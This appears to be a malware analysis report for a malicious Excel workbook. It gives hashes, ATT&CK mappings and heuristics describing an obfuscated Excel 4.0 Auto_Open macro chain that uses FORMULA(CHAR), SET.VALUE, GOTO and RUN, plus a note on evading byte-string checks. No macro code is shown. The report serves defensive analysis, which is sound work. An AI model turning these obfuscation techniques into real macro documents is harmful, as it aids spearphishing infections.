Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4cb73cb960d18d87…

MALICIOUS

Office (OLE)

Size: 237.5 KB
Created: 2020-05-21 08:09:50
Authoring application: Microsoft Excel
First seen: 2020-07-24
MD5: a5d00dfda986cb3f53b9cd952dc829c9
SHA-1: b58be5a997c6de3bc9f28b2a79bbb353963a1141
SHA-256: 4cb73cb960d18d87e3144ded9e4917e3922d999d6a3c5bb46762d8c06a3f3493
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file triggers critical heuristics indicating obfuscated Excel 4.0 macros with an Auto_Open execution chain. The macros are designed to run automatically when the document is opened, suggesting malicious intent to execute arbitrary code. The presence of an Auto_Open entry points to a spearphishing attachment delivery method.

Heuristics 3

  • Excel 4.0 Auto_Open defined name (severity: critical, rule: OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Obfuscated XLM Auto_Open execution chain (severity: critical, rule: OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN)
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
  • Excel 4.0 (XLM) macro sheet present (severity: medium, rule: OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 127981 bytes
SHA-256: 880797d6df024252f777313e8526617b4325832a90d32f335eb1b83d4370e7e4
Preview script
First 1,000 lines of the extracted script